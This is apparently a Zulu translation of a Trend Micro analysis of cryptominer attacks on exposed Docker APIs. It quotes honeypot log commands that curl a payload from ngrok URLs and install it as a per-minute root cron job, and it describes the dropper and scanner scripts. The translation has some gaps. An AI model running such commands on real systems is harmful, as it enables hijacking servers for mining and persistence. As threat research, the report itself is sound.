Sihlaziye idatha eqoqwe kusetshenziswa iziqukathi ze-honeypot, esiyidalile ukuze silandelele izinsongo. Futhi sithole umsebenzi obalulekile ovela kubavukuzi abangafunwa noma abangagunyaziwe be-cryptocurrency abafakwe njengeziqukathi ezinonya kusetshenziswa isithombe esishicilelwe umphakathi ku-Docker Hub. Isithombe sisetshenziswa njengengxenye yesevisi eletha abavukuzi abanonya be-cryptocurrency.
Ukwengeza, izinhlelo zokusebenza ngamanethiwekhi afakiwe ukuze zingene ezitsheni ezivulekile ezingomakhelwane nezinhlelo zokusebenza.
Sishiya izimbiza zethu zoju njengoba zinjalo, okungukuthi, nezilungiselelo ezizenzakalelayo, ngaphandle kwezinyathelo zokuphepha noma ukufakwa okulandelayo kwesoftware eyengeziwe. Sicela uqaphele ukuthi i-Docker inezincomo zokusetha kokuqala ukugwema amaphutha nokuba sengozini okulula. Kodwa izimbiza zoju ezisetshenziswayo ziyiziqukathi, eziklanyelwe ukubona ukuhlasela okuqondiswe endaweni yokufaka iziqukathi, hhayi izinhlelo zokusebenza ezingaphakathi kweziqukathi.
Umsebenzi ongalungile otholiwe uyaphawuleka futhi ngoba awudingi ubungozi futhi futhi uzimele enguqulweni ye-Docker. Ukuthola isithombe esilungiselelwe ngokungalungile, futhi esivuliwe, sesiqukathi yikho konke abahlaseli abakudingayo ukuthelela amaseva amaningi avuliwe.
I-Docker API engavaliwe ivumela umsebenzisi ukuthi enze uhla olubanzi lwe , okuhlanganisa nokuthola uhlu lweziqukathi ezigijimayo, ukuthola izingodo esitsheni esithile, ukuqala, ukumisa (kuhlanganise nokuphoqelelwa) ngisho nokudala isitsha esisha esivela esithombeni esithile esinezilungiselelo ezicacisiwe.
Ngakwesokunxele indlela yokulethwa kwe-malware. Ngakwesokudla indawo yomhlaseli, evumela ukukhishwa okukude kwezithombe.
Ukusatshalaliswa ngezwe lama-Docker API angu-3762 avulekile. Ngokusekelwe kusesho lwe-Shodan lwangomhla ka-12.02.2019/XNUMX/XNUMX
Izinketho zokuhlasela kanye nomthwalo wokukhokha
Umsebenzi omubi awutholwanga kuphela ngosizo lwezimbiza zoju. Idatha evela ku-Shodan ibonisa ukuthi inani lama-Docker APIs adaluliwe (bona igrafu yesibili) linyukile kusukela siphenye isiqukathi esingalungiselelwe kahle esisetshenziswa njengebhuloho lokusebenzisa isofthiwe yezimayini ye-Monero cryptocurrency. Ngo-Okthoba wonyaka odlule (2018, idatha yamanje cishe. umhumushi) bekunama-API avuliwe angu-856 kuphela.
Ukuhlolwa kwezingodo zembiza yoju kwabonisa ukuthi ukusetshenziswa kwesithombe sesitsha kwakuhlobene nokusetshenziswa kwe . Lokhu kuvumela abahlaseli ukuthi badale ama-URL aguqukayo lapho beletha umthwalo okhokhelwayo kuseva evuliwe. Ngezansi kunezibonelo zekhodi ezivela kulogi ebonisa ukuhlukumeza isevisi ye-ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Njengoba ubona, amafayela alayishiwe alandwa kuma-URL ashintsha njalo. Lawa ma-URL anedethi yokuphelelwa yisikhathi emfushane, ngakho okulayishiwe akukwazi ukulandwa ngemva kosuku lokuphelelwa yisikhathi.
Kunezinketho ezimbili zokulayisha okukhokhelwayo. Eyokuqala iyimvukuzi ye-ELF ehlanganisiwe ye-Linux (echazwa ngokuthi i-Coinminer.SH.MALXMR.ATNO) exhuma echibini lezimayini. Okwesibili umbhalo (TrojanSpy.SH.ZNETMAP.A) oklanyelwe ukuthola amathuluzi athile enethiwekhi asetshenziselwa ukuskena ububanzi benethiwekhi bese kuseshwa okuhlosiwe okusha.
Iskripthi se-dropper sisetha okuguquguqukayo okubili, okubese kusetshenziselwa ukuphakela umvukuzi we-cryptocurrency. Okuguquguqukayo kwe-HOST kuqukethe i-URL lapho amafayela anonya atholakala khona, futhi okuguquguqukayo kwe-RIP igama lefayela (empeleni, i-hashi) yomvukuzi okufanele asetshenziswe. Okuguquguqukayo kwe-HOST kushintsha njalo uma ukushintsha kwe-hashi kushintsha. Umbhalo uphinde uzame ukuhlola ukuthi abekho yini abanye abavukuzi be-cryptocurrency abasebenzayo kuseva ehlaselwe.
Izibonelo zokuguquguquka kwe-HOST ne-RIP, kanye namazwibela ekhodi asetshenziselwa ukuhlola ukuthi abekho abanye abavukuzi abasebenzayo.
Ngaphambi kokuqala umvukuzi, uqanjwa kabusha ku-nginx. Ezinye izinguqulo zalesi skripthi ziqamba kabusha umsebenzi wasezimayini kwezinye izinsiza ezisemthethweni okungenzeka zibe khona ezindaweni ze-Linux. Ngokuvamile lokhu kwanele ukudlula ukuhlola ngokumelene nohlu lwezinqubo ezisebenzayo.
Umbhalo wosesho nawo unezici. Isebenza nesevisi ye-URL efanayo ukuze ikhiphe amathuluzi adingekayo. Phakathi kwazo kukhona kanambambili we-zmap, osetshenziselwa ukuskena amanethiwekhi nokuthola uhlu lwamachweba avuliwe. Iskripthi siphinde silayishe enye inambambili esetshenziselwa ukusebenzisana namasevisi atholakele futhi yamukele izibhengezo ezivela kuzo ukuze kutholwe ulwazi olwengeziwe mayelana nesevisi etholiwe (isibonelo, inguqulo yayo).
Iskripthi siphinde sinqume kusengaphambili ububanzi obuthile benethiwekhi obuzoskenwa, kodwa lokhu kuncike enguqulweni yombhalo. Iphinde isethe amachweba okuhlosiwe avela ezinsizeni—kulokhu, i-Docker—ngaphambi kokwenza ukuskena.
Ngokushesha lapho okuhlosiwe kutholakala khona, izibhengezo zikhishwa ngokuzenzakalelayo kuzo. Umbhalo uphinde uhlunge okuhlosiwe kuye ngezinkonzo, izinhlelo zokusebenza, izingxenye noma izinkundla ezithakaselwayo: Redis, Jenkins, Drupal, MODX, , iklayenti le-Docker 1.16 kanye ne-Apache CouchDB. Uma iseva eskeniwe ifana nanoma iyiphi yazo, igcinwa efayeleni lombhalo, abahlaseli abangalisebenzisa kamuva ukuze bahlaziye futhi bagebenge. Lawa mafayela ombhalo alayishwa eziphakelini zabahlaseli ngezixhumanisi eziguqukayo. Okusho ukuthi, i-URL ehlukile isetshenziswa kufayela ngalinye, okusho ukuthi ukufinyelela okulandelayo kunzima.
I-vector yokuhlasela iyisithombe se-Docker, njengoba singabonakala ezingxenyeni ezimbili ezilandelayo zekhodi.
Phezulu kuqanjwa kabusha kusevisi esemthethweni, futhi ngezansi ukuthi i-zmap isetshenziswa kanjani ukuskena amanethiwekhi.
Phezulu kunezinhla zenethiwekhi ezichazwe ngaphambilini, ngezansi kukhona amachweba athile okuseshwa kwezinsiza, okuhlanganisa i-Docker
Isithombe-skrini sibonisa ukuthi isithombe se-alpine-curl silandwe izikhathi ezingaphezu kwezigidi ezingu-10
Ngokusekelwe ku-Alpine Linux ne-curl, ithuluzi elisebenza kahle le-CLI lokudlulisa amafayela ngezivumelwano ezihlukahlukene, ungakha . Njengoba ubona esithombeni esidlule, lesi sithombe sesivele silandwe izikhathi ezingaphezu kwezigidi ezingu-10. Inani elikhulu lokulayisha lingase lisho ukusebenzisa lesi sithombe njengendawo yokungena; lesi sithombe sabuyekezwa esikhathini esingaphezu kwezinyanga eziyisithupha ezedlule; abasebenzisi abazange balande ezinye izithombe kule nqolobane kaningi. E-Docker - isethi yemiyalo esetshenziselwa ukulungisa isiqukathi ukuze siyisebenzise. Uma amasethingi ephoyinti lokungena engalungile (isibonelo, isiqukathi sishiywe sivuliwe ku-inthanethi), isithombe singasetshenziswa njenge-vector yokuhlasela. Abahlaseli bangayisebenzisela ukuletha umthwalo okhokhelwayo uma bethola isiqukathi esingalungiselelwe kahle noma esivuliwe sishiywe singasekelwa.
Kubalulekile ukuqaphela ukuthi lesi sithombe (i-alpine-curl) ngokwaso asiyona into embi, kodwa njengoba ungabona ngenhla, singasetshenziswa ukwenza imisebenzi enonya. Izithombe ezifanayo ze-Docker nazo zingasetshenziswa ukwenza imisebenzi enonya. Sithinte uDocker sasebenza nabo kulolu daba.
Izincomo
izinsalela ezinkampanini eziningi, ikakhulukazi lezo ezisebenzayo , egxile ekuthuthukisweni okusheshayo nasekulethweni. Konke kubhebhethekiswa isidingo sokuthobela imithetho yokucwaningwa kwamabhuku neyokuqapha, isidingo sokuqapha ukugcinwa kwedatha eyimfihlo, kanye nomonakalo omkhulu wokungalandeli kwayo. Ukufaka okuzenzakalelayo kokuvikela emjikelezweni wokuphila wokuthuthukiswa akusizi nje kuphela ukuthi uthole izimbobo zokuphepha okungenzeka zingabonakali, kodwa futhi kukusiza ukuthi wehlise umsebenzi ongadingekile, njengokusebenzisa ukwakhiwa kwesofthiwe eyengeziwe ngobungozi ngakunye okutholiwe noma ukungalungiseki kahle ngemva kokukhishwa kohlelo lokusebenza.
Isigameko okuxoxwe ngaso kulesi sihloko siqokomisa isidingo sokucabangela ukuphepha zisuka nje, kuhlanganise nezincomo ezilandelayo:
- Kubaphathi besistimu nabathuthukisi: Njalo hlola izilungiselelo zakho ze-API ukuze wenze isiqiniseko sokuthi yonke into ilungisiwe ukuze yamukele izicelo ezivela kuseva ethile noma inethiwekhi yangaphakathi.
- Landela isimiso samalungelo amancane: qinisekisa ukuthi izithombe zesiqukathi zisayiniwe futhi ziyaqinisekiswa, khawulela ukufinyelela ezingxenyeni ezibalulekile (isevisi yokwethulwa kwesiqukathi) futhi wengeze ukubethela ekuxhumekeni kwenethiwekhi.
- Landela futhi unike amandla izindlela zokuphepha, isb. futhi eyakhelwe ngaphakathi .
- Sebenzisa ukuskena okuzenzakalelayo kwezikhathi zokusebenza nezithombe ukuze uthole ulwazi olwengeziwe mayelana nezinqubo ezisebenza esitsheni (isibonelo, ukuthola ukonakala noma ukucinga ubungozi). Ukulawula uhlelo lokusebenza nokuqapha ubuqotho kusiza ukulandelela izinguquko ezingavamile kumaseva, amafayela, nezindawo zesistimu.
I-Trendmicro isiza amaqembu e-DevOps akhe ngokuvikelekile, akhiphe ngokushesha, futhi aqalise noma yikuphi. I-Trend Micro Ihlinzeka ngokuvikeleka okunamandla, okuqondisiwe, nokuzenzakalelayo kuwo wonke amapayipi enhlangano ye-DevOps futhi ihlinzeka ngokuvikela okuningi kokusongela ukuvikela imithwalo yokusebenza ngokomzimba, ebonakalayo kanye neyefu ngesikhathi sokusebenza. Iphinde yengeza ukuphepha kwesiqukathi nge и , eskena izithombe zesiqukathi se-Docker ukuze uthole uhlelo olungayilungele ikhompuyutha kanye nokuba sengozini nganoma isiphi isikhathi epayipini lokuthuthukisa ukuvimbela izinsongo ngaphambi kokuthi zisetshenziswe.
Izimpawu zokuvumelana
Ama-hashe ahlobene:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
In Izikhulumi eziprakthiza zibonisa ukuthi yiziphi izilungiselelo okudingeka zenziwe kuqala ukuze kuncishiswe ukuba nokwenzeka noma ukugwema ngokuphelele ukwenzeka kwesimo esichazwe ngenhla. Futhi ngo-Agasti 19-21 endaweni ejulile ye-inthanethi Ungakwazi ukuxoxa ngalezi zinkinga zokuphepha nezinye ezifanayo nozakwenu kanye nothisha abazilolongela etafuleni, lapho wonke umuntu engakhuluma futhi alalele izinhlungu nempumelelo yozakwenu abanolwazi.
Source: www.habr.com